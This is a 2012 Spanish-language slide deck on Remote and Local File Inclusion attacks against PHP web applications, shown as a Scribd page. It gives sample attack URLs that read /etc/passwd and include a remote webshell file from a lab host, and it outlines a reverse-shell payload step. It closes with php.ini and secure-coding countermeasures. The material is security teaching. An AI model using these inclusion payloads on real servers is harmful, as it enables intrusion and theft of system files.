Scribd Logo
Cargar

¡Te damos la bienvenida a Scribd!

  • Remote File Inclusionv1.0

    Cargado por

    drako123456789
    8 vistas13 páginas
    yyyyyyyyyyyyyyyyyyyy

    Derechos de autor

    © © All Rights Reserved

    Formatos disponibles

    PDF, TXT o lea en línea desde Scribd

    ¿Le pareció útil este documento?

    ¿Este contenido es inapropiado?

    Denunciar este documento
    yyyyyyyyyyyyyyyyyyyy

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    8 vistas13 páginas

    Remote File Inclusionv1.0

    Cargado por

    drako123456789
    yyyyyyyyyyyyyyyyyyyy

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    de 13

    Remote File Inclusion

    (RFI)

    File Inclusion (RFI): Incluyendo archivos en


    el sistema operativo
    Diciembre, 2012 Omar Palomino
    omarc320@gmail.com
    Twitter: @ELPalomo_Blog

    http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
    • Ing. Sistemas y Maestrista de Ing. de
    Computación y Sistemas, CEH,
    Security+, ITIL v3.
    • Consultor en seguridad de
    información.
    • Psicólogo que aun no comienza sus
    estudios….
    • Escritor en mis tiempos libres:
    http://www.el-palomo.com
    http://www.facebook.com/El.Palomo.Seguridad.Informacion

    http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
    Introducción al RFI vs ¿Cómo realizar Tomando el Conclusiones y
    LFI el ataque? control del S.O contramedidas

    AVISO Y CONSIDERACIONES LEGALES

     Las técnicas mostradas en la presentación tienen por objetivo CONOCER las técnicas
    utilizadas por los hackers para robar y secuestrar sesiones de aplicaciones web.
     La presentación NO TIENE POR OBJETIVO enseñar técnicas para realizar ataques
    contra aplicaciones web que son penados según la legislación de cada país.
     El autor no se hace responsable del mal uso de las técnicas mostradas en la
    presentación.

    http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
    Introducción al RFI vs ¿Cómo realizar Tomando el Conclusiones y
    LFI el ataque? control del S.O contramedidas

    Descripción

    - RFI: Remote File Inclusion permite añadir scripts o archivos remotos en


    el servidor vulnerable.
    - LFI: Local File Inclusion permite obtener archivos locales almacenados
    en el servidor.
    - RFI nos permitirá subir archivos al servidor vulnerable (*)
    - RFI nos permitirá realizar una conexión reversa a través de un PAYLOAD

    http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
    Introducción al RFI vs ¿Cómo realizar Tomando el Conclusiones y
    LFI el ataque? control del S.O contramedidas

    Descripción
    http://192.168.1.44/fileinclusion/main.php?page=/etc/passwd
    LOCAL FILE INCLUSION (LFI)

    http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
    Introducción al RFI vs ¿Cómo realizar Tomando el Conclusiones y
    LFI el ataque? control del S.O contramedidas

    Funcionamiento (RFI)

    http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
    Introducción al RFI vs ¿Cómo realizar Tomando el Conclusiones y
    LFI el ataque? control del S.O contramedidas

    Funcionamiento

    1.- El servidor WEB controlado por el


    HACKER contiene un script que nos
    permite realizar un UPLOAD de
    archivos.

    2.- Aquí podemos realizar la carga de


    muchos archivos remotos.

    http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
    Introducción al RFI vs ¿Cómo realizar Tomando el Conclusiones y
    LFI el ataque? control del S.O contramedidas

    http://192.168.1.44/fileinclusion/main.php?page=http://192.168.1.48/hacking/c100.txt
    Introducción al RFI vs ¿Cómo realizar Tomando el Conclusiones y
    LFI el ataque? control del S.O contramedidas

    Funcionamiento

    1.- Creamos un PAYLOAD de


    conexión reversa para cargarla al
    servidor vulnerable.

    2.- Colocamos la dirección IP del


    Bactrack en la variable LHOST

    3.- Ejecutamos el script y esperamos


    la conexión reversa..

    http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
    Introducción al RFI vs ¿Cómo realizar Tomando el Conclusiones y
    LFI el ataque? control del S.O contramedidas

    ¿Por qué ocurre el RFI?

    Existen 02 motivos por los cuales está presente esta vulnerabilidad:

    Errores asociados al Administrador de Sistemas:


     Se debe deshabilitar las opciones ALLOW_URL_INCLUDE y ALLOW_URL_FOPEN en php.ini

    http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
    Introducción al RFI vs ¿Cómo realizar Tomando el Conclusiones y
    LFI el ataque? control del S.O contramedidas

    ¿Por qué ocurre el RFI?

    Errores asociados a malas prácticas de programación:


    Inclusión de archivos
    pasados por el método
    GET como página web,
    el mismo representa
    una vulnerabilidad.

    http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
    Introducción al RFI vs ¿Cómo realizar Tomando el Conclusiones y
    LFI el ataque? control del S.O contramedidas

    ¿Cómo evitamos RFI y sus opciones avanzadas?

    ADECUADA METODOLOGÍA DE PROGRAMACIÓN SEGURA, LA


    MISMA QUE DEBE ESTAR ALINEADA A OWASP

    RESTRINGIR CARPETAS CON PERMISOS DE ESCRITURA, PARA QUE NO


    PERMITA EL UPLOAD DE ARCHIVOS MALICIOSOS

    CONFIGURAR ADECUDADAMENTE LAS VARIABLES DEL SERVIDOR


    (ARCHIVO PHP.INI) POR PARTE DEL SYSTEM ADMIN.

    http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
    Remote File Inclusion
    (RFI)

    File Inclusion (RFI): Incluyendo archivos en


    el sistema operativo
    Diciembre, 2012 Omar Palomino
    omarc320@gmail.com
    Twitter: @ELPalomo_Blog

    http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion

    También podría gustarte